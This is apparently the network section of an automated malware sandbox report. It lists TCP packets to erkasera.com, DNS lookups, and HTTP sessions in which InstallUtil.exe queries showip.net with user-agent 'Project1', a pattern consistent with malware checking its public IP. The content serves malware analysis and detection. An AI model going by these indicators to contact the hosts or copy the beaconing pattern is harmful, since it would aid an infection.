Oct 24, 2024 13:40:27.345402002 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.345424891 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.345479965 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.345489979 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.345530987 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.345959902 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.345979929 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.346041918 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.346050024 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.346090078 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.346652031 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.346672058 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.346714973 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.346724033 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.346752882 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.346765995 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.347112894 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.347134113 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.347193956 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.347203016 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.347381115 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.347546101 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.347567081 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.347646952 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.347656012 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.347743988 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.497709990 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.497755051 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.497823000 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.497860909 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.497891903 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.497915983 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.497916937 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.497953892 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.497983932 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.498001099 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.498003960 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.498024940 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.498071909 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.498092890 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.498192072 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.498230934 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.498259068 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.498270988 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.498300076 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.498358011 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.498604059 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.498644114 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.498668909 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.498682022 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.498708010 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.498725891 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.499181032 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.499218941 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.499254942 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.499267101 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.499295950 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.499349117 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.650162935 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.650201082 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.650369883 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.650369883 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.650402069 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.650453091 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.650641918 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.650665045 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.650829077 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.650829077 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.650860071 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.650908947 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.651232958 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.651252985 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.651324034 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.651333094 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.651494980 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.651824951 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.651844978 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.651897907 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.651906967 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.651956081 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.802741051 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.802795887 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.802833080 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.802867889 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.802887917 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.802959919 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.803005934 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.803010941 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.803029060 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.803040981 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.803057909 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.803071022 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.803090096 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.803726912 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.803766966 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.803792953 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.803802013 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.803829908 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.803850889 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.804068089 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.804110050 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.804136992 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.804145098 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.804173946 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.804188013 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.804363966 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.804404020 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.804428101 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.804435968 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.804455996 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.804476023 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.804955959 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.804995060 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.805022001 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.805030107 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.805043936 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.805074930 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.955507040 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.955564022 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.955714941 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.955714941 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.955748081 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.955774069 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.955830097 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.955991983 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.955991983 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.956027031 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.956068039 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.956077099 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.956098080 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.956125975 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.956139088 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.956166983 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.956224918 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.956494093 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.956545115 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.956581116 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.956589937 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.956607103 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.956727028 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.956806898 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.956868887 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.956876993 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.956954956 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.957006931 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.960469961 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:38.824810028 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:38.830171108 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:38.830509901 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:38.830687046 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:38.836334944 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.679135084 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.679155111 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.679179907 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.679194927 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.679220915 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.679224014 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.679238081 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.679255009 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.679280043 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.679296017 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.679316998 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.679328918 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.679332972 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.679356098 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.679390907 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.684837103 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.684854031 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.684915066 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.807620049 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.807637930 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.807655096 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.807687044 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.807715893 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.807775021 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.807821035 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.807950974 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.808056116 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.808098078 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.808114052 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.808129072 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.808144093 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.808146000 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.808171034 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.808207989 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:39.808722019 CEST	80	49800	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:39.808804989 CEST	49800	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:42:06.150392056 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:42:06.156331062 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:42:06.156400919 CEST	49705	80	192.168.2.5	162.55.60.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 13:40:06.052490950 CEST	51147	53	192.168.2.5	1.1.1.1
Oct 24, 2024 13:40:06.225559950 CEST	53	51147	1.1.1.1	192.168.2.5
Oct 24, 2024 13:40:16.175623894 CEST	60676	53	192.168.2.5	1.1.1.1
Oct 24, 2024 13:40:16.190146923 CEST	53	60676	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 24, 2024 13:40:06.052490950 CEST	192.168.2.5	1.1.1.1	0xaefd	Standard query (0)	erkasera.com	A (IP address)	IN (0x0001)	false
Oct 24, 2024 13:40:16.175623894 CEST	192.168.2.5	1.1.1.1	0xaab9	Standard query (0)	showip.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 24, 2024 13:40:06.225559950 CEST	1.1.1.1	192.168.2.5	0xaefd	No error (0)	erkasera.com		188.132.193.46	A (IP address)	IN (0x0001)	false
Oct 24, 2024 13:40:16.190146923 CEST	1.1.1.1	192.168.2.5	0xaab9	No error (0)	showip.net		162.55.60.2	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

erkasera.com

showip.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	162.55.60.2	80	3228	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:40:16.217039108 CEST	58	OUT	GET / HTTP/1.1 User-Agent: Project1 Host: showip.net
Oct 24, 2024 13:40:17.069334030 CEST	1236	IN	HTTP/1.1 200 OK Access-Control-Allow-Headers: * Access-Control-Allow-Methods: * Access-Control-Allow-Origin: * Content-Type: text/html;charset=utf-8 Date: Thu, 24 Oct 2024 11:40:16 GMT Server: Caddy Transfer-Encoding: chunked Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED] Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
Oct 24, 2024 13:40:17.069349051 CEST	1236	IN	Data Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;
Oct 24, 2024 13:40:17.069360971 CEST	1236	IN	Data Raw: 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 22 70 72 6f 74 6f 74 79 70 65 22 21 3d 63 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 Data Ascii: var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.A=b.prototype}function ma(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=argu
Oct 24, 2024 13:40:17.069400072 CEST	1236	IN	Data Raw: 67 65 22 29 29 7c 7c 28 43 28 29 3f 41 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 42 28 22 45 64 67 2f 22 29 29 7c 7c 43 28 29 26 26 41 28 22 4f 70 65 72 61 22 29 29 3b 76 61 72 20 73 61 3d 7b 7d 2c 45 3d 6e 75 6c 6c 3b 76 61 72 20 Data Ascii: ge"))\|\|(C()?A("Microsoft Edge"):B("Edg/"))\|\|C()&&A("Opera"));var sa={},E=null;var ta="undefined"!==typeof Uint8Array,ua=!ra&&"function"===typeof btoa;var F="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():void 0,G=F?function(a,b
Oct 24, 2024 13:40:17.069411039 CEST	1236	IN	Data Raw: 61 79 28 61 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 64 3d 48 28 61 29 3b 69 66 28 64 26 36 34 29 72 65 74 75 72 6e 20 61 3b 64 7c 3d 36 34 3b 69 66 28 63 26 26 28 64 7c 3d 35 31 32 2c 63 21 3d 3d 61 5b 30 5d 29 29 74 68 72 6f 77 20 45 72 Data Ascii: ay(a))throw Error();d=H(a);if(d&64)return a;d\|=64;if(c&&(d\|=512,c!==a[0]))throw Error();a:{c=a;var e=c.length;if(e){var f=e-1,g=c[f];if(N(g)){d\|=256;b=(d>>9&1)-1;e=f-b;1024<=e&&(za(c,b,g),e=1023);d=d&-2095105\|(e&1023)<<11;break a}}b&&(g=(d>>9&
Oct 24, 2024 13:40:17.069422007 CEST	1236	IN	Data Raw: 3d 62 5b 28 77 26 31 35 29 3c 3c 32 7c 68 3e 3e 36 5d 3b 68 3d 62 5b 68 26 36 33 5d 3b 63 5b 65 2b 2b 5d 3d 67 2b 6b 2b 77 2b 68 7d 67 3d 30 3b 68 3d 64 3b 73 77 69 74 63 68 28 61 2e 6c 65 6e 67 74 68 2d 66 29 7b 63 61 73 65 20 32 3a 67 3d 61 5b Data Ascii: =b[(w&15)<<2\|h>>6];h=b[h&63];c[e++]=g+k+w+h}g=0;h=d;switch(a.length-f){case 2:g=a[f+1],h=b[(g&15)<<2]\|\|d;case 1:a=a[f],c[e]=b[a>>2]+b[(a&3)<<4\|g>>4]+h+d}a=c.join("")}return a}}return a};function Ba(a,b,c){a=Array.prototype.slice.call(a);var d=
Oct 24, 2024 13:40:17.069432020 CEST	1236	IN	Data Raw: 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 61 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 63 7c 7c 62 26 32 3f 4b 3a 78 61 2c 65 3d 21 21 28 62 26 33 32 29 3b 61 3d 42 61 28 61 2c 62 2c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e Data Ascii: urn a}}function Ha(a,b,c){var d=c\|\|b&2?K:xa,e=!!(b&32);a=Ba(a,b,function(f){return Ga(f,e,d)});G(a,32\|(c?2:0));return a};function Ia(a,b){a=a.h;return Ja(a,J(a),b)}function Ja(a,b,c,d){if(-1===c)return null;if(c>=L(b)){if(b&256)return a[a.leng
Oct 24, 2024 13:40:17.069473028 CEST	1236	IN	Data Raw: 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 45 61 28 74 68 69 73 2e 68 2c 46 61 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 21 31 2c 21 31 29 3b 72 65 74 75 72 6e 20 50 61 28 74 68 69 73 2c 61 2c 21 30 29 7d 3b 54 2e Data Ascii: toJSON=function(){var a=Ea(this.h,Fa,void 0,void 0,!1,!1);return Pa(this,a,!0)};T.prototype.s=M;T.prototype.toString=function(){return Pa(this,this.h,!1).toString()}; function Pa(a,b,c){var d=a.constructor.v,e=L(J(c?a.h:b)),f=!1;if(d){if
Oct 24, 2024 13:40:17.069483995 CEST	1236	IN	Data Raw: 28 61 29 7b 74 68 69 73 2e 68 3d 52 28 61 29 7d 6e 28 52 61 2c 54 29 3b 76 61 72 20 53 61 3d 51 61 28 52 61 29 3b 76 61 72 20 55 3b 66 75 6e 63 74 69 6f 6e 20 56 28 61 29 7b 74 68 69 73 2e 67 3d 61 7d 56 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 Data Ascii: (a){this.h=R(a)}n(Ra,T);var Sa=Qa(Ra);var U;function V(a){this.g=a}V.prototype.toString=function(){return this.g+""};var Ta={};function Ua(){return Math.floor(2147483648Math.random()).toString(36)+Math.abs(Math.floor(2147483648Math.random())
Oct 24, 2024 13:40:17.069495916 CEST	1236	IN	Data Raw: 32 46 74 59 6d 56 79 58 7a 49 30 5a 48 41 75 63 47 35 6e 22 29 2c 61 62 3d 70 2e 61 74 6f 62 28 22 57 57 39 31 49 47 46 79 5a 53 42 7a 5a 57 56 70 62 6d 63 67 64 47 68 70 63 79 42 74 5a 58 4e 7a 59 57 64 6c 49 47 4a 6c 59 32 46 31 63 32 55 67 59 Data Ascii: 2FtYmVyXzI0ZHAucG5n"),ab=p.atob("WW91IGFyZSBzZWVpbmcgdGhpcyBtZXNzYWdlIGJlY2F1c2UgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlIGlzIGludGVyZmVyaW5nIHdpdGggdGhpcyBwYWdlLg=="),bb=p.atob("RGlzYWJsZSBhbnkgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlLCB0aGVu
Oct 24, 2024 13:40:17.074935913 CEST	1236	IN	Data Raw: 2c 22 49 4d 47 22 29 3b 64 2e 63 6c 61 73 73 4e 61 6d 65 3d 55 61 28 29 3b 64 2e 73 72 63 3d 24 61 3b 64 2e 61 6c 74 3d 22 57 61 72 6e 69 6e 67 20 69 63 6f 6e 22 3b 64 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 32 34 70 78 22 3b 64 2e 73 74 79 Data Ascii: ,"IMG");d.className=Ua();d.src=$a;d.alt="Warning icon";d.style.height="24px";d.style.width="24px";d.style["padding-right"]="16px";var e=X(a),f=X(a);f.style["font-weight"]="bold";f.textContent=ab;var g=X(a);g.textContent=bb;Y(a,e,f);Y(a,e,g);Y(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49800	162.55.60.2	80	7108	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:40:38.830687046 CEST	58	OUT	GET / HTTP/1.1 User-Agent: Project1 Host: showip.net
